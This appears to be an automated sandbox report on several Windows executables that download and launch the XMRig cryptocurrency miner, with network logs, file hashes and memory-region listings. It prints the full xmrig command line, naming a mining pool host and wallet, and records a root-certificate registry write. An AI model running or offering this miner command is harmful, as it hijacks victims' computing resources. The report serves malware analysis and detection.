memory/640-32-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-33-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-34-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-35-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-36-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-37-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-38-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-39-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-40-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-41-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-42-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-43-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-44-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-45-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-46-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-47-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-48-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-49-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-50-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-51-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-52-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-53-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-54-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-55-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-56-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-57-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-58-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-59-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-60-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-61-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-62-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-63-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-64-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-65-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-66-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-67-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-68-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-69-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-70-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-71-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-72-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-73-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-74-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-75-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-76-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-77-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-78-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-79-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-80-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-81-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-82-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 14:26
Platform
win10v2004-20240508-en
Max time kernel
1787s
Max time network
1799s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:16
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2604 wrote to memory of 2428 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2604 wrote to memory of 2428 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2428-14-0x0000025327B40000-0x0000025327B60000-memory.dmp
memory/2428-15-0x0000025329480000-0x00000253294A0000-memory.dmp
memory/2428-16-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-18-0x00000253294A0000-0x00000253294C0000-memory.dmp
memory/2428-17-0x00000253294C0000-0x00000253294E0000-memory.dmp
memory/2428-19-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-20-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-23-0x00000253294A0000-0x00000253294C0000-memory.dmp
memory/2428-22-0x00000253294C0000-0x00000253294E0000-memory.dmp
memory/2428-21-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-24-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-25-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-26-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-27-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-28-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-29-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-30-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-31-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-32-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-33-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-34-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-35-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-36-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-37-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-38-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-39-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-40-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-41-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-42-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-43-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-44-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-45-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-46-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-47-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-48-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-49-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-50-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-51-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-52-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-53-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-54-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-55-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-56-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-57-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-58-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-59-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-60-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-61-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-62-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-63-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-64-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-65-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-66-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-67-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-68-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-69-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-70-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-71-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-72-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-73-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-74-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-75-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-76-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-77-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-78-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-79-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-80-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-81-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
memory/2428-82-0x00007FF735EA0000-0x00007FF7369A3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240611-en
Max time kernel
1798s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1104 wrote to memory of 4888 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1104 wrote to memory of 4888 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| BE | 88.221.83.201:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 201.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4888-14-0x00000158CFA60000-0x00000158CFA80000-memory.dmp
memory/4888-15-0x00000158CFBC0000-0x00000158CFBE0000-memory.dmp
memory/4888-16-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-18-0x00000158CFBE0000-0x00000158CFC00000-memory.dmp
